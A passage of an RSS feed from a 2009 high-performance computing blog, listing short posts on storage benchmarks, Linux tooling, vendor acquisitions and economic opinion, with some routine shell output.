      <link>https://blog.scalability.org/2009/09/now-thats-one-big-pepperoni-pizza/</link>
      <pubDate>Fri, 04 Sep 2009 19:24:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/now-thats-one-big-pepperoni-pizza/</guid>
      <description>Get ready to laugh a little &amp;hellip;
landman@metal:~$ dd if=/dev/zero of=big-huge-file-system-target.img bs=1k seek=2T count=1 1+0 records in 1+0 records out 1024 bytes (1.0 kB) copied, 4.4349e-05 s, 23.1 MB/s landman@metal:~$ ls -alF big-huge-file-system-target.img -rw-r--r-- 1 landman landman 2251799813686272 2009-09-04 17:25 big-huge-file-system-target.img landman@metal:~$ ls -alhF big-huge-file-system-target.img -rw-r--r-- 1 landman landman 2.1P 2009-09-04 17:25 big-huge-file-system-target.img  2.1PB file &amp;hellip; eh ? Not so much &amp;hellip;
landman@metal:~$ ls -aslhF big-huge-file-system-target.img 4.0K -rw-r--r-- 1 landman landman 2.</description>
    </item>
    
    <item>
      <title>HPC for Dummies book!</title>
      <link>https://blog.scalability.org/2009/09/hpc-for-dummies-book/</link>
      <pubDate>Fri, 04 Sep 2009 18:32:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/hpc-for-dummies-book/</guid>
      <description>Doug Eadline has an e-book out. From the posting on Beowulf:
It appears to be Windows/Mac only though (not Doug&amp;rsquo;s fault, don&amp;rsquo;t blame him). Hopefully a sane version (e.g. PDF) will be generated soon. Doug is, of course, the chief monkey at Cluster Monkey, and an all around good guy.</description>
    </item>
    
    <item>
      <title>Nailed it ...  unfortunately</title>
      <link>https://blog.scalability.org/2009/09/nailed-it-unfortunately/</link>
      <pubDate>Fri, 04 Sep 2009 12:56:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/nailed-it-unfortunately/</guid>
      <description>This article is right on the money.
Yeah, sounds about right. The states&#39; 21st century fund is &amp;ldquo;investing&amp;rdquo; in buggy whips &amp;hellip; advanced manufacturing, homeland security, energy, and biotech. Which are things that this state is not know for. But the &amp;ldquo;investments&amp;rdquo; are poorly done, which might even be an optimistic view of them, with the focus areas, and investment process being &amp;hellip; well &amp;hellip; not well thought out. Politically, it plays well to various interests.</description>
    </item>
    
    <item>
      <title>Oracle &#43; Sun roundup</title>
      <link>https://blog.scalability.org/2009/09/oracle-sun-roundup/</link>
      <pubDate>Fri, 04 Sep 2009 11:03:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/oracle-sun-roundup/</guid>
      <description>First is the news that the merger may be running afoul of the European regulators. It would be a (terminal) disaster for Sun if it did. Their revenues continue to crater quarter after quarter. Customers do not like uncertainty. The rationale for this is reduction in competition in the DB market. Because of MySQL. Which, if you read other technical blogs and news sources for MySQL, Sun seems to have managed to piss off their community of users and contributers.</description>
    </item>
    
    <item>
      <title>Which CPU is faster, 3.2 GHz Nehalem W5580 or 2.6 GHz Istanbul?</title>
      <link>https://blog.scalability.org/2009/09/which-cpu-is-faster-3-2-ghz-nehalem-w5580-or-2-6-ghz-istanbul/</link>
      <pubDate>Thu, 03 Sep 2009 11:13:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/which-cpu-is-faster-3-2-ghz-nehalem-w5580-or-2-6-ghz-istanbul/</guid>
      <description>Yes this is a loaded question. The context I use is a very simple double precision floating point loop, with the interior re-written to use SSE2. The idea is, if we run the identical program on the same machine, running one core, doing little else but double precision FP operations (in this case, computing the Riemann Zeta Function), with very little to no memory traffic &amp;hellip; which CPU core will win on this very simple sprint?</description>
    </item>
    
    <item>
      <title>RHEL 5.4 is out, Centos 5.4 forthcoming</title>
      <link>https://blog.scalability.org/2009/09/rhel-5-4-is-out-centos-5-4-forthcoming/</link>
      <pubDate>Wed, 02 Sep 2009 17:16:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/rhel-5-4-is-out-centos-5-4-forthcoming/</guid>
      <description>According to LWN (what, you&amp;rsquo;re not a subscriber? For shame!) Redhat EL 5.4 came out. With a long awaited feature. XFS. Redhat, its about time. It was added into the kernel &amp;hellip; what &amp;hellip; 8 years ago?</description>
    </item>
    
    <item>
      <title>Going to be busy with a storage cluster build for the next few weeks ...</title>
      <link>https://blog.scalability.org/2009/08/going-to-be-busy-with-a-storage-cluster-build-for-the-next-few-weeks/</link>
      <pubDate>Mon, 31 Aug 2009 00:08:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/going-to-be-busy-with-a-storage-cluster-build-for-the-next-few-weeks/</guid>
      <description>Should be fun, and I&amp;rsquo;ll talk more about it later on. Expect to see some interesting test case benchmarks start coming from us on this.</description>
    </item>
    
    <item>
      <title>Rumor of HP looking at Sun HW acquisition</title>
      <link>https://blog.scalability.org/2009/08/rumor-of-hp-looking-at-sun-hw-acquisition/</link>
      <pubDate>Mon, 31 Aug 2009 00:03:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/rumor-of-hp-looking-at-sun-hw-acquisition/</guid>
      <description>Reported on the Inquirer site. The claim is that this deal would complement the EDS services business. Hmmm&amp;hellip;. HP could take (and is taking) Sun&amp;rsquo;s business for effectively free. Why would they pay for something they can get for free? Something just doesn&amp;rsquo;t ring true about this, and I&amp;rsquo;d chalk this rumor up to more wishful thinking on the part of some of the reporters sources.
Never mind the regulatory hurdles HP would have to go through as one of the top hardware vendors.</description>
    </item>
    
    <item>
      <title>In the end, it is all about money</title>
      <link>https://blog.scalability.org/2009/08/in-the-end-it-is-all-about-money/</link>
      <pubDate>Fri, 28 Aug 2009 01:01:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/in-the-end-it-is-all-about-money/</guid>
      <description>An article on softpedia  discusses the state of the windows/linux client and server markets. I can personally attest to seeing Microsoft scrambling to try to turn every Linux opportunity into a windows win, but I am not sure they completely grasp what they are up against. This article amplifies this.
While I take issue with some of their wording &amp;hellip; many customers we know are using Linux, free or paid subscription &amp;hellip; precisely for the critical business needs, due to the control and cost issues.</description>
    </item>
    
    <item>
      <title>A small DeltaV test</title>
      <link>https://blog.scalability.org/2009/08/a-small-deltav-test/</link>
      <pubDate>Thu, 27 Aug 2009 11:40:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/a-small-deltav-test/</guid>
      <description>This is for a customer who wants to run a benchmark today. Wish we had a JackRabbit in the lab, but our engineering machine is at a customer site. One &amp;ldquo;blade&amp;rdquo; of a &amp;ldquo;CX1&amp;rdquo; with 3.2 GHz Nehalem&amp;rsquo;s, 24 GB ram (about to bump this to 72 GB for customer benchmark), an SDR Infiniband connection (1GB/s max). DeltaV3 (ΔV3) with an 8 disk RAID6 (6 data drives, maximum read speed of about 660 MB/s), and a 6 disk RAID10 (not being used for this test).</description>
    </item>
    
    <item>
      <title>M&amp;A:  Tibco snaps up DataSynapse</title>
      <link>https://blog.scalability.org/2009/08/ma-tibco-snaps-up-datasynapse/</link>
      <pubDate>Mon, 24 Aug 2009 17:41:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/ma-tibco-snaps-up-datasynapse/</guid>
      <description>See here. DataSynapse, for those who don&amp;rsquo;t know, makes tools that help financial services folks schedule work across large clusters. They are pretty big on wall street. They are now going to be part of Tibco. Competitors are Platform et al. As this Great Recession marches on, I do expect to see additional M&amp;amp;A; activity, in order to strengthen portfolios, provide capability enhancement, and so forth. It all comes down to cost-benefit analysis.</description>
    </item>
    
    <item>
      <title>Sun&#43;Oracle update:  not done yet, but they are in a rush</title>
      <link>https://blog.scalability.org/2009/08/sunoracle-update-not-done-yet-but-they-are-in-a-rush/</link>
      <pubDate>Sun, 23 Aug 2009 13:16:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/sunoracle-update-not-done-yet-but-they-are-in-a-rush/</guid>
      <description>It was reported earlier this week that Oracle received an OK from US DOJ to acquire Sun. A new article suggests the reason for the speed.
How bad was it?
This isn&amp;rsquo;t quite a cratering &amp;hellip; unless you consider the last several quarters in a row. And this is because customers aren&amp;rsquo;t dumb, they know proprietary gear needs support (ignore the marketing &amp;hellip; if you can&amp;rsquo;t buy the same bits on the open market from more than one source, it is proprietary).</description>
    </item>
    
    <item>
      <title>Odd Gridengine &#43; OpenMPI 1.3.x interaction: non-advancing jobs</title>
      <link>https://blog.scalability.org/2009/08/odd-gridengine-openmpi-1-3-x-interaction-non-advancing-jobs/</link>
      <pubDate>Sat, 22 Aug 2009 15:15:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/odd-gridengine-openmpi-1-3-x-interaction-non-advancing-jobs/</guid>
      <description>Banging my head against this one. OpenMPI 1.3.x is IMO one of the best MPI stacks available. It makes my life easy in many regards, and most of the time, it just works. Gridengine is a venerable job scheduler, albeit one that hasn&amp;rsquo;t done a great job with MPI integration in the past. I remember writing reaper scripts to clean up after MPICH1/2 runs for various customers. Tight integration as it is called, didn&amp;rsquo;t work that well.</description>
    </item>
    
    <item>
      <title>Try &#43; buy programs</title>
      <link>https://blog.scalability.org/2009/08/try-buy-programs/</link>
      <pubDate>Wed, 19 Aug 2009 21:57:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/try-buy-programs/</guid>
      <description>We no longer do try and buy programs. We&amp;rsquo;ve found that customers would use our unit to lever our competitors down in price, and extract additional concessions from them. Just walk them by our box with the blinkenlights, and the nice logos &amp;hellip; scared quite a few sales reps into submission. Then we get our box back after the other vendor is suitably scared. There&amp;rsquo;s no upside for us, at all.</description>
    </item>
    
    <item>
      <title>Business focus ... scaling programs up</title>
      <link>https://blog.scalability.org/2009/08/business-focus-scaling-programs-up/</link>
      <pubDate>Wed, 19 Aug 2009 18:42:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/business-focus-scaling-programs-up/</guid>
      <description>This is about scalability in processes and administration of programs, not really HPC. Last month, I took advantage of cash 4 clunkers. I got rid of a car I swore to drive into the ground (which I nearly did). In 4 days, the government is finally admitting, it had 250k transactions. The dealerships were crowded. The websites, which were the font of all information and arrangements? Basically massively overloaded. Fast forward to today, where I saw this article.</description>
    </item>
    
    <item>
      <title>Rumors of Infiniband&#39;s (imminent) demise ...</title>
      <link>https://blog.scalability.org/2009/08/rumors-of-infinibands-imminent-demise/</link>
      <pubDate>Tue, 18 Aug 2009 13:32:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/rumors-of-infinibands-imminent-demise/</guid>
      <description>&amp;hellip; are greatly exaggerated. John at InsideHPC has an article on Cisco&amp;rsquo;s move out of Infiniband which refers to another article on this. I have to basically say, I&amp;rsquo;ll believe 10GbE conquering IB when I see it. Every year is proclaimed to be the year that IB is vanquished by 10GbE. I was reporting on this stuff 2+ years ago, and asked very simple questions just last year. When will 10GbE come into its own in HPC?</description>
    </item>
    
    <item>
      <title>Been excessively busy ... my apologies ...</title>
      <link>https://blog.scalability.org/2009/08/been-excessively-busy-my-apologies/</link>
      <pubDate>Mon, 17 Aug 2009 14:22:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/been-excessively-busy-my-apologies/</guid>
      <description>generating many quotes, finalizing bits on storage cluster wins (you&amp;rsquo;ll hear about this soon), taking orders, starting several benchmark and support efforts, speaking to a group to help us get started raising capital. Busy busy busy &amp;hellip;</description>
    </item>
    
    <item>
      <title>OpenSuSE issues with a few things for cluster</title>
      <link>https://blog.scalability.org/2009/08/opensuse-issues-with-a-few-things-for-cluster/</link>
      <pubDate>Mon, 10 Aug 2009 12:00:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/opensuse-issues-with-a-few-things-for-cluster/</guid>
      <description>First off, it appears that the zypper problem is solved. Zypper shares some similer command line bits with yum. This helped with a faster learning curve. Zypper also supports a feature I wish were in yum, but I use grep for. zypper search gcc and yum list | grep gcc are the same in function. Zypper is also much faster than yum. Interpreted languages don&amp;rsquo;t work so well with large data sets, such as many installation packages, and dense dependency trees they have to construct and traverse.</description>
    </item>
    
    <item>
      <title>OpenSuSE 11.1 allows OFED 1.4.2 to compile</title>
      <link>https://blog.scalability.org/2009/08/opensuse-11-1-allows-ofed-1-4-2-to-compile/</link>
      <pubDate>Sun, 09 Aug 2009 20:51:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/opensuse-11-1-allows-ofed-1-4-2-to-compile/</guid>
      <description>Ok, we had to use our 2.6.27.9 kernel, but it works fine otherwise. This looks like a reasonable solution to the customers problem. Will be able to reload most of their compute nodes remotely, the head node may be more complex. I need to see if binaries compiled on OpenSuSE 10.2 will work w/o problem on OpenSuSE 11.1. I suspect so, but the Ubuntu 8.xx and 9.xx used different glibc/gcc bits and caused a few hiccups for some apps.</description>
    </item>
    
    <item>
      <title>NIH syndrome:  Yum doesn&#39;t work on SuSE 11.1</title>
      <link>https://blog.scalability.org/2009/08/nih-syndrome-yum-doesnt-work-on-suse-11-1/</link>
      <pubDate>Sun, 09 Aug 2009 15:30:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/nih-syndrome-yum-doesnt-work-on-suse-11-1/</guid>
      <description>It seems that yum, a reasonably good, quite standard, and powerful tool for maintaining systems across Redhat/Centos, Fedora, and multiple other distributions &amp;hellip; was deprecated in SuSE in favor of an &amp;ldquo;Invented Here&amp;rdquo; tool such as zypper. I am running into this right now with attempting to get OFED installed on OpenSUSE 11.1 to see if this will solve a customer problem. Yum is a convenient and powerful tool, common across many distros.</description>
    </item>
    
    <item>
      <title>Cloud migrations to most beneficial tax regime ...</title>
      <link>https://blog.scalability.org/2009/08/cloud-migrations-to-most-beneficial-tax-regime/</link>
      <pubDate>Sat, 08 Aug 2009 19:43:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/cloud-migrations-to-most-beneficial-tax-regime/</guid>
      <description>I thought this was interesting. Microsoft basically pulling a plug on a large project over tax issues, and moving its capability to where it has a more favorable situation. I see a simple (and dare I say obvious) evolution in the cloud infrastructure landscape.
Take your container systems, put them on a truck and drive them to where the taxes are best. This would create demand for points of presence with good power and network connections.</description>
    </item>
    
    <item>
      <title>T&amp;C&#39;s</title>
      <link>https://blog.scalability.org/2009/08/tcs/</link>
      <pubDate>Fri, 07 Aug 2009 17:09:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/tcs/</guid>
      <description>Been very busy &amp;hellip; good busy &amp;hellip; but busy. Brief T&amp;amp;C; discussion, as this is near and dear to my heart right now. We find lots of variation in T and C documentation. Some of it is reasonable, some is simply ridiculous. Call it onerous, call it egregious. The vast majority of the ridiculous language focuses on providing a huge lever over the seller by the buyer. Some of my favorites are &amp;ldquo;we can return it if we want, for any reason, and you have no recourse whatsoever&amp;rdquo;, &amp;ldquo;you will pay for our costs if we decide to go another route&amp;rdquo;, &amp;ldquo;you may not charge fees for late payment, or institute collection actions&amp;rdquo;, &amp;ldquo;you will give us most preferred customer pricing, regardless of how little we buy from you&amp;rdquo;, and &amp;ldquo;we will pay when we please&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-08-05</title>
      <link>https://blog.scalability.org/2009/08/twitter-updates-for-2009-08-05/</link>
      <pubDate>Wed, 05 Aug 2009 07:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/twitter-updates-for-2009-08-05/</guid>
      <description>* @[garystiehr](http://twitter.com/garystiehr) Doug did a good job on them. We are getting many hits from #[insideHPC](http://search.twitter.com/search?q=%23insideHPC) for #[storage](http://search.twitter.com/search?q=%23storage) for #[HPC](http://search.twitter.com/search?q=%23HPC) systems now [in reply to garystiehr](http://twitter.com/garystiehr/statuses/3119965913) [#](http://twitter.com/sijoe/statuses/3134050087) * fighting battles I should not be fighting ... [#](http://twitter.com/sijoe/statuses/3134391117) * Done with one proposal, now onto an analysis, a letter of support for a proposal, a CV for the proposal, a patent analysis ... its only 11pm [#](http://twitter.com/sijoe/statuses/3138092256)  Powered by Twitter Tools.</description>
    </item>
    
    <item>
      <title>Cilk Arts acquired by Intel</title>
      <link>https://blog.scalability.org/2009/08/cilk-arts-acquired-by-intel/</link>
      <pubDate>Tue, 04 Aug 2009 02:08:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/cilk-arts-acquired-by-intel/</guid>
      <description>Story here. InsideHPC has been covering them for a while. Cilk was/is a different approach to parallelism than language developers traditionally used. Basically it deployed various work queues for each core, and the work queues decided when they needed more work. As I remember, they could &amp;ldquo;steal&amp;rdquo; from other work queues. The net effect of this was an effectively implicitly described parallelism. I am probably explaining it wrong. It is a neat way to work, but it is focused upon C++.</description>
    </item>
    
    <item>
      <title>Real economic stimulus: lower barriers to purchase</title>
      <link>https://blog.scalability.org/2009/08/real-economic-stimulus-lower-barriers-to-purchase/</link>
      <pubDate>Sun, 02 Aug 2009 19:38:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/08/real-economic-stimulus-lower-barriers-to-purchase/</guid>
      <description>There is much being written about C4C (Cash for Clunkers). As I had noted in my own previous article, we did take advantage of it. So my writing is biased to some degree. I am personally opposed to wealth transfer as I noted. Those who busted their rear ends to make money ought to be able to keep it and spend it as they see fit. Barring that, if the government decides that stimulating a particular part of the economy is good, they can make things happen, in a big way.</description>
    </item>
    
    <item>
      <title>Cash for clunkers:  why it was a good idea</title>
      <link>https://blog.scalability.org/2009/07/cash-for-clunkers-why-it-was-a-good-idea/</link>
      <pubDate>Fri, 31 Jul 2009 12:46:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/cash-for-clunkers-why-it-was-a-good-idea/</guid>
      <description>This is more economic than HPC related, but it has a relationship to HPC as it turns out. Cash for clunkers was designed to replace lower MPG cars with higher MPG cars, by offering effectively a discount for purchase. The government allocated $1B to the program. It started Monday. As of today, Friday, the money is gone. Inventory was moved, it is no longer aging, Higher MPG cars are now on the roads.</description>
    </item>
    
    <item>
      <title>Notes:  7 years in 2 days, and some new product stuff</title>
      <link>https://blog.scalability.org/2009/07/notes-7-years-in-2-days-and-some-new-product-stuff/</link>
      <pubDate>Thu, 30 Jul 2009 13:31:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/notes-7-years-in-2-days-and-some-new-product-stuff/</guid>
      <description>Our 7-year business anniversary (from when we started) is in 2 days. We launched 1-August-2002, at the height of the internet bubble collapse. I took a golden handshake from my employer at the time and formed Scalable. Took the risk I had always been afraid of. 7 years ago. Amazing. Growing and profitable six out of the seven years since then. Yes, we may have a 7th anniversary sale. Contact us if you want details, or if you want to take advantage of it early.</description>
    </item>
    
    <item>
      <title>Git book</title>
      <link>https://blog.scalability.org/2009/07/git-book/</link>
      <pubDate>Wed, 29 Jul 2009 02:35:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/git-book/</guid>
      <description>Here. икони</description>
    </item>
    
    <item>
      <title>There are many things to like in modern Linux.  NetworkManager is NOT one of them.</title>
      <link>https://blog.scalability.org/2009/07/there-are-many-things-to-like-in-modern-linux-networkmanager-is-not-one-of-them/</link>
      <pubDate>Mon, 27 Jul 2009 18:20:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/there-are-many-things-to-like-in-modern-linux-networkmanager-is-not-one-of-them/</guid>
      <description>I have never had as many problems directly caused by one application, across so many machines, across so many distributions, as NetworkManager. For those who don&amp;rsquo;t know, NetworkManager is your friendly helper application (mistakenly) adopted by distros to handle setting up networks. This would be well and good if it, I dunno, actually worked? I won&amp;rsquo;t recount my long painful history with it. Suffice it to say, everywhere I see it &amp;hellip; everywhere &amp;hellip; I immediately replace it with wicd.</description>
    </item>
    
    <item>
      <title>So close ... so close ... and then ...</title>
      <link>https://blog.scalability.org/2009/07/so-close-so-close-and-then/</link>
      <pubDate>Sun, 26 Jul 2009 14:31:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/so-close-so-close-and-then/</guid>
      <description>In this past weeks HPCwire podcast, Chris Willard and Michael Feldman discuss many things. The business side of HPC, the future of companies, etc. I agreed with everything they said (having said it here in these pages in the past). That is, until the last minute. Thats where what they said doesn&amp;rsquo;t quite mesh with what we observe and are experiencing. Specifically, they suggesting that in these tough times, end users are being more conservative, sticking with the large vendors, and eschewing the smaller vendors.</description>
    </item>
    
    <item>
      <title>What is the future of storage?</title>
      <link>https://blog.scalability.org/2009/07/what-is-the-future-of-storage/</link>
      <pubDate>Sat, 25 Jul 2009 18:48:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/what-is-the-future-of-storage/</guid>
      <description>I am seeing lots of deep soul searching in pundit circles, as well as head scratching on the part of customers, as various vendors writhe and contort in their death throes. Pundits regularly trash that which they neither grasp, nor prefer. Customers wonder what the right path going forward is. Vendors struggle to figure out what the market really wants, and to be able to offer that (all the while the marketing teams are spinning hard and fast).</description>
    </item>
    
    <item>
      <title>&#34;But we can&#39;t use you because you are not &#39;X&#39;&#34;</title>
      <link>https://blog.scalability.org/2009/07/but-we-cant-use-you-because-you-are-not-x/</link>
      <pubDate>Thu, 23 Jul 2009 02:03:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/but-we-cant-use-you-because-you-are-not-x/</guid>
      <description>Been running into a bit of this recently. Its usually preceded or followed with some sort of performance requirement, that &amp;lsquo;X&amp;rsquo; just can&amp;rsquo;t hit, or they would need so much of &amp;lsquo;X&amp;rsquo; that it blows their budget up. I find it interesting that the IT folks, the ones really worried about their futures due to budget cuts placing pressure on them to do more while spending less, really get our message, and grok what we do, and how we can help them achieve their mission goals while reducing their costs.</description>
    </item>
    
    <item>
      <title>Itanic sinks at SGI</title>
      <link>https://blog.scalability.org/2009/07/itanic-sinks-at-sgi/</link>
      <pubDate>Thu, 23 Jul 2009 01:47:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/itanic-sinks-at-sgi/</guid>
      <description>This was a long time coming. The previous management, prior to them sinking in april 2009, nor the management teams before that &amp;hellip; going back at least 10 years, would never have done this. Its a shame. It should have happened long long ago.
Basically Itanium is now legacy at SGI. I remember asking at some engineering/sales meeting what the plan B was. I remember the management blinking rapidly, but not giving an answer.</description>
    </item>
    
    <item>
      <title>JR5: Marathon run</title>
      <link>https://blog.scalability.org/2009/07/jr5-marathon-run/</link>
      <pubDate>Wed, 22 Jul 2009 20:29:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/jr5-marathon-run/</guid>
      <description>For those benchmark pr0n viewers &amp;hellip; here is Scalable Informatics Inc. JackRabbit JR5 unit with 48 drives. Simple benchmark. How long does it take you to write 1TB. How about 524 seconds?
[root@jr5 ~]# !498 mpirun -np 8 ./io-bm.exe -n 1024 -f /data/file -w -d -s -v -------------------------------------------------------------------------- [[8861,1],3]: A high-performance Open MPI point-to-point messaging module was unable to find any relevant network interfaces: Module: OpenFabrics (openib) Host: jr5.scalableinformatics.com Another transport will be used instead, although this may result in lower performance.</description>
    </item>
    
    <item>
      <title>A silly bug in io-bm</title>
      <link>https://blog.scalability.org/2009/07/a-silly-bug-in-io-bm/</link>
      <pubDate>Wed, 22 Jul 2009 04:44:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/a-silly-bug-in-io-bm/</guid>
      <description>It wasn&amp;rsquo;t enough to impact results, but it was enough to cause questioning my results (and sanity). Part of the IO operation is having N processes write to 1 file. To make this happen correctly, each process has to compute their offset into the file, and start operations from there. There is a seek involved. Now if I am smart, it won&amp;rsquo;t be lseek(file_descriptor,0,SEEK_SET); Nope &amp;hellip; that would be wrong (the zero).</description>
    </item>
    
    <item>
      <title>Getting Inc.ed</title>
      <link>https://blog.scalability.org/2009/07/getting-inc-ed/</link>
      <pubDate>Tue, 21 Jul 2009 20:53:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/getting-inc-ed/</guid>
      <description>Somewhat of a play on getting inked, the day job is now an Inc. rather than an LLC. The reasons for the change are many, ranging from taxes, to important things like raising capital. Yeah, I know, we are at a 15 year low for VC investments. But this is a capital intensive business, and we are growing, and have a need. So, this is one option for pursuing the capital we need.</description>
    </item>
    
    <item>
      <title>rethinking git vs hg</title>
      <link>https://blog.scalability.org/2009/07/rethinking-git-vs-hg/</link>
      <pubDate>Mon, 20 Jul 2009 20:43:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/rethinking-git-vs-hg/</guid>
      <description>I thought git was just getting better than mercurial. I found that basic git operations are easy, but others appear to be harder than I like (setting up remote repositories). Just tried the same thing with hg that I tried (and failed to do) with git. Worked like a charm.
landman@pgda-100:~/target$ hg push ssh://mmmmq@mmmmq/hg/target pushing to ssh://mmmmq@mmmmq/hg/target searching for changes remote: adding changesets remote: adding manifests remote: adding file changes remote: added 1 changesets with 5 changes to 5 files  hg can use ssh, which looks like it makes lots of stuff simple.</description>
    </item>
    
    <item>
      <title>Talking about high performance ...</title>
      <link>https://blog.scalability.org/2009/07/talking-about-high-performance/</link>
      <pubDate>Sun, 19 Jul 2009 19:45:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/talking-about-high-performance/</guid>
      <description>&amp;hellip; the Blue Angels are doing hard banks right above my house right now, as part of the Willow Run Thunder over Michigan airshow. We went to it yesterday, but live close enough that we see them on their far turns. Two minutes ago they were literally right over my house, doing a hard bank. Have pictures and videos. Most impressive! These guys and gals have some serious high performance hardware &amp;hellip; I have to admit, some of my favorite parts were when they did their high speed passes, and then opened up with afterburners on the climb out.</description>
    </item>
    
    <item>
      <title>... and HP snarfs up Ibrix ...</title>
      <link>https://blog.scalability.org/2009/07/and-hp-snarfs-up-ibrix/</link>
      <pubDate>Fri, 17 Jul 2009 20:07:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/and-hp-snarfs-up-ibrix/</guid>
      <description>See here Whats Dell going to do now? Ibrix is Dell&amp;rsquo;s favorite parallel file system for clusters.</description>
    </item>
    
    <item>
      <title>More JackRabbit 96TB OpenSolaris system</title>
      <link>https://blog.scalability.org/2009/07/more-jackrabbit-96tb-opensolaris-system/</link>
      <pubDate>Fri, 17 Jul 2009 19:01:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/more-jackrabbit-96tb-opensolaris-system/</guid>
      <description>even more JackRabbit OpenSolaris 2009.06 goodness.
landman@pgda-100:~$ ssh scalable@192.168.1.74 Password: Last login: Fri Jul 17 13:32:57 2009 Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008 scalable@jr5-96TB:~$ su Password: scalable@jr5-96TB:~# zpool create tank c7t1d0 c10t2d0 c11t3d0 scalable@jr5-96TB:~# zpool status tank pool: tank state: ONLINE scrub: none requested config: NAME STATE READ WRITE CKSUM tank ONLINE 0 0 0 c7t1d0 ONLINE 0 0 0 c10t2d0 ONLINE 0 0 0 c11t3d0 ONLINE 0 0 0 errors: No known data errors scalable@jr5-96TB:~# df -h /tank Filesystem size used avail capacity Mounted on tank 70T 19K 70T 1% /tank  70TB of ZFS on JR5-96Tn.</description>
    </item>
    
    <item>
      <title>JR5 96TB running OpenSolaris 2009.06</title>
      <link>https://blog.scalability.org/2009/07/jr5-96tb-running-opensolaris-2009-06/</link>
      <pubDate>Fri, 17 Jul 2009 18:13:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/jr5-96tb-running-opensolaris-2009-06/</guid>
      <description>Scalable Informatics JackRabbit OpenSolaris pr0n for those disposed to such things. Remember, this is a 2.5+ GB/s machine (e.g. measured bandwidth on RAID6, not &amp;ldquo;theoretical bandwidth&amp;rdquo; with a RAID0). From what I can see, this is the largest (capacity) and fastest (raw and usable) performance OpenSolaris machine on the market. 8 Nehalem cores, 72 GB RAM, 96TB raw, 72TB usable in 5U, for under $60k USD, with 10GbE and/or Infiniband. There does appear to be some strangeness upon setup &amp;hellip; Solaris was not willing to run on a &amp;gt; 2TB disk.</description>
    </item>
    
    <item>
      <title>When debugging ... make sure you have evidence before you point fingers</title>
      <link>https://blog.scalability.org/2009/07/when-debugging-make-sure-you-have-evidence-before-you-point-fingers/</link>
      <pubDate>Thu, 16 Jul 2009 22:01:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/when-debugging-make-sure-you-have-evidence-before-you-point-fingers/</guid>
      <description>A 128 core cluster, user is experiencing &amp;lsquo;strange&amp;rsquo; delays in their application. It is an MPI code, we found problems in previously. I have to admit that at first I was amused when someone blamed the MPI stack, claiming it was broken, and did so by demonstrating that they didn&amp;rsquo;t know how to use an MPI stack. Their test case, literally copied from from an online course (possibly even our course materials), was the MPI-HelloWorld fortran example.</description>
    </item>
    
    <item>
      <title>OT:  Bad ideas ... part II</title>
      <link>https://blog.scalability.org/2009/07/ot-bad-ideas-part-ii/</link>
      <pubDate>Thu, 16 Jul 2009 15:09:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/ot-bad-ideas-part-ii/</guid>
      <description>Again, not a partisan issue &amp;hellip; this approach to fund something by penalizing one group is a very bad idea. Cigarette and alcohol taxes are in place and as high as they are, specifically to change behavior. Making something far more expensive does materially impact the way people behave. It causes them to perform more cost-benefit analyses. And they change their behaviors. I am quite certain that those who designed this legislation did not anticipate that by significantly increasing taxes on businesses, that this would impact &amp;hellip; I dunno &amp;hellip; employment?</description>
    </item>
    
    <item>
      <title>Irresistable force?  meet Immovable object ...</title>
      <link>https://blog.scalability.org/2009/07/irresistable-force-meet-immovable-object/</link>
      <pubDate>Thu, 16 Jul 2009 01:36:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/07/irresistable-force-meet-immovable-object/</guid>
